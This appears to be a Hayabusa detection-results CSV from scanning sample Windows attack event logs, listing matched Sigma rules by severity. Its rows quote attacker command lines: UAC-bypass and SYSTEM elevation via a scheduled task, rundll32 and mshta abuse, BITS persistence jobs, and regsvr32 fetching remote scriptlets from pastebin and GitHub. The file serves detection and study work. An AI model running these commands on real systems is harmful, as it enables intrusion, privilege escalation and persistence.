2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta""   :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe""  -a c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\pcalua.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\pcalua.exe""  -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor  :  URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll  :  Path: C:\ProgramData\jabber.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: jabber.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola  :  URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding  :  Path: C:\Windows\System32\mobsync.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R  :  Path: C:\Windows\System32\wbem\WMIADAP.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding  :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /groups  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /groups  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
